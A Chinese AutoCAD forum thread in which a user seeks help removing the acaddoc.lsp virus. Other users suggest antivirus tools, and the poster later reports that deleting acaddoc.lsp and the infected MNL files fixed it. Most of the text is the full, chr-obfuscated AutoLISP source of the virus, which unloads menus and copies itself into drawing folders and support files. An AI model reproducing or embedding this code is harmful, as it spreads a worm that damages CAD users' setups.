求史上最强的CAD病毒acaddoc.lsp专杀方法
本帖最后由 cumtjh 于 2011-3-17 14:52 编辑求CAD病毒acaddoc.lsp专杀
非常不幸,我的CAD中毒了,原因不详
CAD中病毒 ,特征如下:
1、打开一个CAD文件,目录下相应产生一个acaddoc.lsp文件
2、关键影响菜单加载。定义加载的菜单文件在CAD启动后加载又被立即卸载,所以菜单文件无法加载。
本人通过一些专杀以及完全卸载(删除目录),重新安装CAD都没有作用,病毒依旧存在,而且是2004 2006 2008经重新安装同时感染。
麻烦群里的高手给我想想办法,找到问题症结,我担心的是系统格式化病毒依旧存在
手动加载了,菜单显示有
但一点关闭按钮,菜单自动消失
AUTOCAD启动后命令行提示如下:
命令: menuload
无效或重复的别名: TB_JBCS (存在于工具栏: 常用工具 中)。
加载自定义文件成功。自定义组: MCAD
命令:
MineCAD 菜单实用程序
已成功地卸载自定义文件。自定义组: MCAD
文件目录下产生的acaddoc.lsp病毒文件中的内容如下:
;文件目录下产生的acaddoc.lsp病毒文件中的内容如下:
(setq s::startup nil)
(setq *startup*(strcat(chr 40)
(chr 115)
(chr 101)
(chr 116)
(chr 113)
(chr 32)
(chr 115)
(chr 58)
(chr 58)
(chr 115)
(chr 116)
(chr 97)
(chr 114)
(chr 116)
(chr 117)
(chr 112)
(chr 32)
(chr 110)
(chr 105)
(chr 108)
(chr 41)
)
)
(setq *acad-object* nil)
(defun vlex-file-attribute (filename / filenamenew tmpname)
(setq fileatt nil)
(setq filenamenew (findfile filename))
(setqtmpname(strcat(vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat(chr 92)
(chr 116)
(chr 109)
(chr 112)
(chr 46)
(chr 116)
(chr 120)
(chr 116)
)
)
)
(vl-file-copy (findfile filename) tmpname)
(if (vl-file-delete filename)
(progn
(setq fileatt T)
(vl-file-copy tmpname filenamenew)
(vl-file-delete tmpname)
)
(progn
(setq fileatt nil)
(vl-file-delete tmpname)
)
)
fileatt
)
(defun vlex-to-file (filepath strlist / wjh extstr tetstr wjhh)
(if (findfile filepath)
(progn
(setq tetstr T)
(setq wjh (open (findfile filepath) (chr 114)))
(while (setq txtstr (read-line wjh))
(if (= txtstr *startup*)
(setq tetstr nil)
)
)
(close wjh)
(if tetstr
(progn
(if (vlex-file-attribute filepath)
(progn
(setq wjhh (open (findfile filepath) (chr 97)))
(write-line (chr 13) wjhh)
(foreach n strlist
(write-line n wjhh)
)
(close wjhh)
)
)
)
)
)
(progn
(setq wjjh (open filepath (chr 119)))
(foreach n strlist
(write-line n wjjh)
)
(close wjjh)
)
)
)
(defun vlex-file-strlist (filenpath text / wjh srlst tmp tep)
(setq srlst nil)
(setq wjh (open filenpath (chr 114)))
(while (setq tmp (read-line wjh))
(if(= tmp text)
(setq tep T)
)
(iftep
(setq srlst (append srlst (list tmp)))
)
)
(if wjh
(close wjh)
)
srlst
)
(defun vlex-string-listall (str delimiter / post strlst)
(if str
(progn (setq strlst nil)
(while (vl-string-search delimiter str)
(setq post (vl-string-search delimiter str))
(setq strlst (append strlst (list (substr str 1 post))))
(setq str (substr str (+ post 2)))
)
(vl-remove "" (append strlst (list str)))
)
)
)
(defun vlex-acadobject ()
(cond(*acad-object*)
(T (setq *acad-object* (vlax-get-acad-object)))
)
)
(defun vlex-menugroups () (vla-get-menugroups (vlex-acadobject)))
(defun vlex-menugroups-listall (/ out)
(vlax-for each (vlex-menugroups)
(setq out (cons (vla-get-name each) out))
)
(reverse out)
)
(setvar "cmdecho" 0)
(vl-load-com)
(setq menulist (vlex-menugroups-listall))
(foreach n menulist
(if (/= (strcase n)
(strcat
(chr 65)
(chr 67)
(chr 65)
(chr 68)
)
)
(command (strcat (chr 109)
(chr 101)
(chr 110)
(chr 117)
(chr 117)
(chr 110)
(chr 108)
(chr 111)
(chr 97)
(chr 100)
)
n
)
)
)
;;;
;;;=== General Utility Functions ===
;;;
(setq filepath (vlex-string-listall
(getenv (strcat
(chr 65)
(chr 67)
(chr 65)
(chr 68)
)
)
(chr 59)
)
)
(setq mnufilelist
nil
mnlfilelist
nil
lspfilelist
nil
filealllist
nil
strlist nil
dwgpath nil
)
(foreach n filepath
(if (vl-directory-files
n
(strcat
(chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 108)
)
1
)
(setq mnlfilelist
(append mnlfilelist
(vl-directory-files
n
(strcat (chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 108)
)
1
)
)
)
)
)
(foreach n filepath
(if (vl-directory-files
n
(strcat
(chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 117)
)
1
)
(setq mnufilelist
(append mnufilelist
(vl-directory-files
n
(strcat (chr 42)
(chr 46)
(chr 109)
(chr 110)
(chr 117)
)
1
)
)
)
)
)
(setq lspfilelist
(vl-directory-files
(strcat (vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat (chr 92)
(chr 115)
(chr 117)
(chr 112)
(chr 112)
(chr 111)
(chr 114)
(chr 116)
)
)
(strcat
(chr 42)
(chr 46)
(chr 108)
(chr 115)
(chr 112)
)
)
)
(setq lspfilelist
(append lspfilelist
(vl-directory-files
(vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat (chr 42)
(chr 46)
(chr 108)
(chr 115)
(chr 112)
)
)
)
)
(setq acadpath (strcat (vl-filename-directory
(findfile (strcat (chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 46)
(chr 101)
(chr 120)
(chr 101)
)
)
)
(strcat (chr 92)
(chr 115)
(chr 117)
(chr 112)
(chr 112)
(chr 111)
(chr 114)
(chr 116)
)
)
)
(if (findfile (getvar (strcat (chr 100)
(chr 119)
(chr 103)
(chr 110)
(chr 97)
(chr 109)
(chr 101)
)
)
)
(setqdwgpath(vl-filename-directory
(findfile (getvar (strcat (chr 100)
(chr 119)
(chr 103)
(chr 110)
(chr 97)
(chr 109)
(chr 101)
)
)
)
)
)
(setq dwgpath acadpath)
)
(setq dwgpath (strcat dwgpath
(chr 92)
(chr 97)
(chr 99)
(chr 97)
(chr 100)
(chr 100)
(chr 111)
(chr 99)
(chr 46)
(chr 108)
(chr 115)
(chr 112)
)
)
(setq filealllist (append mnlfilelist lspfilelist (list dwgpath)))
(setq listnum (length filealllist))
(setq num 0)
(while (< num listnum)
(setq filename (nth num filealllist))
(if (findfile filename)
(setq strlist (vlex-file-strlist (findfile filename) *startup*))
)
(if strlist
(setq num (1+ listnum))
)
(setq num (1+ num))
)
(vlex-to-file dwgpath strlist)
(foreach n mnufilelist
(setqmnlfile(strcat(vl-filename-directory (findfile n))
(chr 92)
(vl-filename-base (findfile n))
(chr 46)
(chr 109)
(chr 110)
(chr 108)
)
)
(vlex-to-file mnlfile strlist)
)
(foreach n filealllist
(vlex-to-file n strlist)
)
(princ)
;;;
;;; To restore the system variables.
;;;
(if (/= (getvar "sdi") 0)(setvar "sdi" 0))
(if (/= (getvar "acadlspasdoc") 1)(setvar "acadlspasdoc" 1))
(if (/= (getvar "zoomfactor") 40)(setvar "zoomfactor" 40))
(if (/= (getvar "mbuttonpan") 1)(setvar "mbuttonpan" 1))
(if (/= (getvar "highlight") 1)(setvar "highlight" 1))
(if (/= (getvar "fillmode") 1)(setvar "fillmode" 1))
(if (/= (getvar "pickadd") 1)(setvar "spickadd" 1))
(if (/= (getvar "pickauto") 1)(setvar "pickauto" 1))
(if (/= (getvar "pickfirst") 1)(setvar "pickfirst" 1))
(if (/= (getvar "filedia") 1)(setvar "filedia" 1))
(if (/= (getvar "blipmode") 0)(setvar "blipmode" 0))
(if (/= (getvar "fillmode") 1)(setvar "fillmode" 1))
(if (/= (getvar "textfill") 1)(setvar "textfill" 1))
(princ)
兄弟们,帮帮我吧我的神啊,救救我吧 没法工作啦
没有看明白什么意思 到这里看看CAD病毒吧!可能对你有帮助!
http://u.115.com/folder/f43d1ca8bbd# 一般的杀软都行啊 superzhzh 发表于 2011-3-16 17:49 static/image/common/back.gif
一般的杀软都行啊
不行的今天早上在LISP群里 讨论都没解决 好像360就行吧。原来mse不能杀的,现在也可以了 本帖最后由 cumtjh 于 2011-6-30 23:51 编辑
问题已经解决 ,感谢大家的帮忙问题原因 在于不单感染acaddoc.lsp 而是感染了自定义文件中的MNL文件删除acaddoc.lsp 和MNL文件即可(问题已经解决) 感谢明经的朋友 你好,现在本人CAD也是感染了acaddoc病毒,能否麻烦你讲下mnl文件在哪?
http://bbs.mjtd.com/xwb/images/bgimg/icon_logo.png 来自 傅花使者zz 的新浪微博 这个病毒困扰人啊,我的空间里面那个就是处理这个问题的,不妨试试,在我的机器上实验了,可以彻底解决了:
自制CAD病毒专杀
http://bbs.mjtd.com/forum.php?mod=viewthread&tid=85455&fromuid=246364
(出处: 明经CAD社区)
页:
[1]